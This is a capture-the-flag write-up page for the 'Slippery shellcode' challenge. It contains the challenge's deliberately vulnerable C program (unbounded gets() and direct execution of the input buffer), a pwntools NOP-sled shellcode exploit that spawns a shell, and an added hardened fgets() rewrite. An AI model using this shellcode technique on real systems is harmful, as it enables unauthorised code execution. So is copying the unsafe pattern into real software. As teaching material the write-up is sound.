Slippery shellcode

cheaterdxd edited this page Oct 13, 2019 · 1 revision

Question

This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/slippery-shellcode_1_69e5bb04445e336005697361e4c2deb0 on the shell server. Source.

Hint

No hint

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 512
#define FLAGSIZE 128

void vuln(char *buf){
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter your shellcode:");
  vuln(buf);

  puts("Thanks! Executing from a random location now...");

  int offset = (rand() % 256) + 1;
  
  ((void (*)())(buf+offset))();


  puts("Finishing Executing Shellcode. Exiting now...");
  
  return 0;
}

Solution

We know we must find a way to bypass the offset. Since offset = rand() % 256 + 1, the offset is always in the range 1..256, i.e. always smaller than 257. So if we place 256 NOP instructions in front of the shellcode, the jump always lands inside the NOP sled (or exactly at the start of the shellcode), and execution slides down the NOPs into the shellcode.

Exploit

from pwn import *

s = process('./vuln')
# 32-bit Linux execve("/bin/sh") shellcode generated by pwntools
shellcode = asm(shellcraft.i386.linux.sh())
# NOP sled: the call target buf+offset has offset in 1..256, so 257 NOPs
# guarantee it lands inside the sled and slides into the shellcode.
# The payload must be bytes (not str) under Python 3.
payload = b'\x90' * 257 + shellcode
s.sendline(payload)
s.interactive()
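A hardened replacement for vuln(), added here as an example and not part of the challenge or the original writeup: the unbounded gets() is swapped for a length-checked fgets() read sized to the same BUFSIZE, so over-long input is cut at the buffer boundary instead of overwriting the stack. The function names read_line_bounded, run_case, stored_len_for and truncated_for are my own. The program's other defect, the indirect call into buf, has no safe form and should simply be removed; this block only covers the bounded read.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSIZE 512   /* same buffer size as the challenge program */

/* Bounded replacement for vuln(): reads one line into buf (at most size-1
 * bytes plus NUL) and never writes past it. Strips the trailing newline as
 * gets() did. If the line did not fit, sets *truncated and discards the rest
 * of the line so the next read starts clean. Returns bytes stored, -1 on EOF. */
int read_line_bounded(char *buf, size_t size, FILE *in, int *truncated) {
    *truncated = 0;
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
    } else if (len == size - 1) {
        int c = fgetc(in);               /* buffer full: is more line pending? */
        if (c != EOF && c != '\n') {
            *truncated = 1;
            while ((c = fgetc(in)) != EOF && c != '\n')
                ;                        /* drop the overflowing remainder */
        }
    }
    return (int)len;
}

/* Constructed self-check: feed a line of `fill` 'A's through the reader with
 * a BUFSIZE stack buffer, as main() would. Returns bytes stored; *truncated
 * reports whether the input was cut. */
int run_case(size_t fill, int *truncated) {
    char *line = malloc(fill + 2);
    char buf[BUFSIZE];
    int n = -1;
    if (line == NULL) return -1;
    memset(line, 'A', fill);
    line[fill] = '\n';
    line[fill + 1] = '\0';
    FILE *in = fmemopen(line, fill + 1, "r");
    if (in != NULL) {
        n = read_line_bounded(buf, sizeof buf, in, truncated);
        fclose(in);
    }
    free(line);
    return n;
}

int stored_len_for(size_t fill) { int t = 0; return run_case(fill, &t); }
int truncated_for(size_t fill) { int t = 0; run_case(fill, &t); return t; }
```

A 600-byte line (longer than the challenge's 512-byte buffer) is stored as 511 bytes and flagged as truncated; a 511-byte line fits exactly and is not flagged.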